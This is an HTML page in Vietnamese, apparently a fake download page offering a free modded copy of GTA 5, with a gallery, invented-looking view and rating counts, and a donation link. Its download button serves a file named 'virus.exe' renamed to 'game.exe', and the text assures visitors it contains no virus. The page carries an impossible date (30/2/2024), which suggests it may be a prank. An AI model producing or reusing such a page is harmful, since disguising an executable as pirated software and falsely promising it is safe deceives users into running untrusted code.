<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="/game/flicky.css" media="screen">
    <title>Tải game free</title>
    <style>
        body {
            color: dimgrey;
            line-height: 1.9rem;
            font-family: 'Quicksand', sans-serif;
            -webkit-font-smoothing: antialiased;
            -moz-osx-font-smoothing: grayscale;
        }

        .section img {
            width: 100%;
            border-radius: 0.375rem;
        }

        .section {

            width: 80vw;
            margin: auto;
            display: grid;
            column-gap: 4rem;
            grid-template-columns: repeat(3, minmax(0, 1fr));
        }

        .left {
            border-radius: 0.375rem;
            box-shadow: 0 25px 50px -12px rgb(0 0 0 / 0.25);
            grid-column: span 2 / span 2;
        }

        .content {
            padding: 2rem;
            font-size: 1.1rem;
            font-weight: 400;
        }

        .right {
            padding: 2rem;
        }

        .download,
        .info,
        .stat {
            border-radius: 0.375rem;
            box-shadow: 0 25px 50px -12px rgb(0 0 0 / 0.25);
            padding: 2rem;
        }

        hr.solid {
            border-top: 0.5px solid #ececec;
        }

        .author {
            color: #898f96;
            font-size: 15px;
            display: flex;
            column-gap: 2rem;
        }


        button {
            width: 100%;
            transition-duration: 900ms;
            height: 3rem;
            background-color: #ff6a6d;
            border-width: 0px;
            border-radius: 0.375rem;
            font-size: 1rem;
            color: white;
            cursor: pointer;

        }

        button:hover {
            background-color: #c82333;
        }

        .tt {
            display: flex;
            justify-content: space-between;
        }

        .tt>p {
            margin: 0.1rem;
        }

        .stat>* {
            line-height: 3rem;
        }


        .gallery {
            background: #EEE;
        }

        a {
            color: white;
            text-decoration: none;
            width: 100vw;
        }
    </style>
</head>

<body>

    <section class="section">
        <div class="left">
            <img src="/game/gta.png" alt="">
            <div class="content">

                <div <p style="font-size: 25px;line-height: 40px;font-weight: 500;">🕹️🎮 Grand Theft Auto 5 v1.60 Full
                    mod
                    free guns and girls</p>

                    <p class="author">
                        <span>

                            👨🏻bởi<a href="https://www.facebook.com/MiTaaaa131" style="color:#898f86;"> <span
                                    style="color: #007bff;">chú
                                    Thái</span> và đồng bọn</a>
                        </span>
                        <span>
                            🗓️ 30/2/2024
                        </span>

                    </p>
                </div>
                <hr class="solid">
                <p> <span style="font-weight: 700;">
                        Grand Theft Auto V

                    </span>
                    hay
                    <span style="font-weight: 700;">
                        GTA V , GTA 5
                    </span>
                    là một game phiêu lưu hành động thế giới mở phát triển và xuất
                    bản
                    bởi Rockstar Games . GTA V sẽ được thiết lập trong thành phố hư cấu Los Santos ở bang San Andreas và
                    các
                    khu vực xung quanh của nó, dựa trên Los Angeles và Nam California.
                </p>
            </div>
            <div>
                <div class="gallery js-flickity" data-flickity-options='{ "wrapAround": true }'>

                    <img src="/game/gta1.png" alt="">
                    <img src="/game/gta2.png" alt="">
                    <img src="/game/gta3.png" alt="">
                    <img src="/game/gta4.png" alt="">
                    <img src="/game/gta5.png" alt="">
                </div>
            </div>
        </div>

        <div class="right">
            <div class="download">
                <p style="font-size: 25px;line-height: 40px;font-weight: 500;">Tải game ngay đi
                    <br>
                    <span style="font-size: 15px;">
                        ko có vi rút đâu ae tải
                        thỏa mái 😁
                    </span>
                </p>
                <hr class="solid">
                <p>
                    Nếu thấy game GTA 5 hay thì nhớ <span style="font-weight: 700;color: black;">
                        ủng hộ mình
                    </span> các bạn nhé 😍😘
                </p>

                <button style="background-color: #ffc000;margin-bottom: 1rem;">
                    <a href="https://www.buymeacoffee.com/minhphonghh"
                        style="color: black;font-weight: 700;font-family: cursive;">
                        🍵Buy me a coffee
                    </a>
                </button>
                <button>
                    <a href="./game/virus.exe" download="game.exe">
                        🖱️ Tải liền chứ ngại gì
                    </a>
                </button>
            </div>
            <div class="info">
                <p style="font-size: 25px;line-height: 40px;font-weight: 500;">ℹ️ Thông tin game</p>
                <hr class="solid">
                <div class="tt">
                    <p style="">Loại:</p>
                    <p style="">Game búp bê</p>
                </div>
                <div class="tt">
                    <p style="">Phát hành

                        :</p>
                    <p style="">
                        14/04/2015

                    </p>
                </div>
                <div class="tt">
                    <p style="">Cập nhật:</p>
                    <p style="">
                        27/01/2021

                    </p>
                </div>
                <div class="tt">
                    <p style="">Phiên bản:</p>
                    <p style="">v1.60</p>
                </div>
                <div class="tt">
                    <p style="">Multiplayer:</p>
                    <p style="">Có

                    </p>
                </div>
            </div>

            <div class="stat">
                <div class="tt">
                    <p style="">👁️‍🗨️Lượt xem:</p>
                    <p style="color: black; font-size: 22px;">1598
                    </p>
                </div>
                <hr class="solid">
                <div class="tt">
                    <p style="">🖱️Lượt tải:</p>
                    <p style="color: black; font-size: 22px;">1490
                    </p>
                </div>
                <hr class="solid">


                <div class="tt">
                    <span style="color: #ffc000;font-size: 200%;">
                        &starf;
                    </span>
                    <span style="color: #ffc000;font-size: 200%;">
                        &starf;
                    </span>
                    <span style="color: #ffc000;font-size: 200%;">
                        &starf;
                    </span>
                    <span style="color: #ffc000;font-size: 200%;">
                        &starf;
                    </span>
                    <span style="color: #ffc000;font-size: 200%;">
                        &starf;
                    </span>
                    <p style="color: black; font-size: 20px;">1406
                    </p>
                </div>
                <hr class="solid">


            </div>
        </div>
    </section>
    <script src="/game/flicky.js"></script>
</body>

</html>